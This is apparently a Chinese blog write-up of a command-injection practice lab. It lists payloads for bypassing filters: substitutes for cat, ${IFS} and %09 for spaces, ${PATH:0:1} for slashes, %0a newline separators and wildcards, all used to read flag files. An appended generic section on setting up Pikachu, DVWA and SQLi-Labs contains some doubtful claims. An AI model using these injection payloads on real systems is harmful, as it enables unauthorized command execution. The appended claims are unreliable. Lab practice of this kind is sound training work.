vulrange命令执行靶场绕过

1.开启靶场,提示过滤了cat命令

1.过滤了cat命令可以用其他的命令代替
(1)more
(2)head
(3)sort
等其他的命令替代

|ls
#显示flag文件
|ls flag
#显示flag文件
显示出flag852456.txt
| more flag/flag852456.txt
读取flag

读取到的flag,其实也可以直接访问这个文件。

2.过滤空格

${IFS}

${IFS}$1

$IFS+$1

<>

%09(php环境下)

通过上面三种方式可以绕过空格

但是只可以在命令和参数中进行绕过,用重定向符号时候会报错(>>)

显示flag文件夹下的flag文件

显示flag

|more${IFS}flag/flag294861.txt

3.过滤目录分割符

${PATH:0:1}(linux环境变量)
;使用分割号分割命令,这也是linux的管道符和&作用一样

flag文件

& cd flag && more flag357951.txt

;cd flag;cat flag357951.txt

|cat flag${PATH:0:1}flag357951.txt(没成功,可能是系统的问题)

3.综合过滤

过滤了各种管道符号,斜杠和空格然后还有flag和cat字符,逐一绕过就行

还可以在url输入%0a来执行换行操作,来绕过管道符号和;但是一定要直接输入到浏览器的地址栏上,否则就会被编码成%250a就会失效,%0d,%1a(windows)也可以做命令分割符号来绕过
%0als

一定要直接输入到地址栏中才行!!

%0Als${IFS}fla*

用通配符绕过flag限制

%0Amore$IFS$1fla*${PATH:0:1}fla*.txt (没成功)

%0amore$IFS$9fl*${PATH:0:1}fla*.txt  (没成功)

%0Acd${IFS}fl*%0Amore${IFS}fla*.txt (成功)

%0A绕过管道和;

${PATH:0:1}绕过斜杆

${IFS}绕过空格

fa*通配符绕过flag


要我说只要知道了flag文件夹和flag文件名字直接读取就行了吧



IP/flag/flag753654.txt

这个靶机的flag文件是空的,我就随便写点东西进去就行了。

ps(在过滤目录分割符的时候${PATH:0:1}没有成功,不知道问什么,可能是靶机的原因,请各位大佬不吝赐教。)

### 关于PHP命令执行漏洞的练习环境构建 #### 使用Pikachu靶场 对于希望深入理解并实践PHP命令执行漏洞的学习者来说,Pikachu是一个非常合适的平台。该靶场提供了一个模拟真实Web应用的安全测试环境,在其中可以安全地探索各种类型的注入攻击,包括命令执行漏洞。通过特定的实验场景,学习者能够了解如何利用`exec()`函数来执行系统命令以及防范措施。 当配置Pikchu靶场时,需特别关注所使用的PHP版本。为了兼容某些老旧功能(如`mysql_`系列函数),建议安装PHP 5.x版本[^3]。这是因为自PHP 7起,部分API已被更新为更安全的形式(例如改为`mysqli_`)。然而需要注意的是,尽管较低版本允许更多传统代码运行,但在实际生产环境中应始终采用最新稳定版以获得最佳安全性保障。 #### 设置DVWA(Damn Vulnerable Web Application) 另一个广受欢迎的选择是Damn Vulnerable Web Application (DVWA),它同样提供了针对多种常见Web应用程序缺陷的教学案例,其中包括了命令注入在内的多个模块供研究之用。按照官方文档指导完成基本部署后,记得调整至适当级别的难度以便更好地掌握防御技巧。 在准备过程中要注意到,由于不同操作系统间可能存在差异,因此具体操作细节可能会有所变化;同时也要确保服务器端软件栈(比如Apache、MySQL等)均处于良好工作状态之下。 #### SQLi-Labs 实验室 SQLi-Labs作为一个专注于SQL注入教学目的而设计的项目,虽然名称强调了SQL方面的问题,但实际上也涵盖了其他种类的安全隐患探讨——当然这之中自然少不了对PHP环境下命令执行风险的研究。遵循其提供的指南进行本地化安装是非常有益的做法之一[^4]。 ```bash git clone https://github.com/Audi-1/sqli-labs.git /var/www/html/ cd /var/www/html/Security/sqli/Less-1 chmod -R 755 . chown -R www-data:www-data . # For Debian-based systems like Ubuntu ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值